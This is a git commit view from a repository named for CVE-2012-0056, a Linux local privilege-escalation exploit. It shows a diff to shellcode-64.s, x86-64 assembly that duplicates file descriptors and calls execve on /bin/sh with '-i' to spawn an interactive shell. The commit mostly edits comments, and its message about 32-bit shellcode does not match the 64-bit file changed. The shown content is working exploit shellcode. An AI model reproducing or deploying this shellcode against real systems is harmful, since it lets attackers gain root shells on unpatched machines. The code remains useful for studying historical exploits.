diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
| commit | 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac (patch) | |
| tree | df5f2aed70c872d7bc3059e2dc6de6c78fb17f90 /shellcode-64.s | |
| parent | Add custom 64bit shellcode and preserve stderr. (diff) | |
| download | CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.tar.xz CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.zip | |
Add 32bit shellcode.
Diffstat (limited to 'shellcode-64.s')
| -rw-r--r-- | shellcode-64.s | 4 |
1 files changed, 2 insertions, 2 deletions
diff --git a/shellcode-64.s b/shellcode-64.s index 2514ed2..f465c5d 100644 --- a/shellcode-64.s +++ b/shellcode-64.s @@ -19,13 +19,13 @@ mov sil,0x2 mov al,0x21 syscall -; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) +; execve("/bin/sh", ["/bin/sh", "-i", 0], 0) mov qword rbx,'//bin/sh' ; rbx = //bin/sh shr rbx,0x8 ; remove leading / from rbx push rbx ; push rbx to stack mov rdi,rsp ; set rdi (arg 1) to top of stack -xor rbx,rbx +xor rbx,rbx ; rbx = 0 mov bx,'-i' ; rbx = '-i' push rbx ; push rbx to stack mov rcx,rsp ; set rcx to top of stack |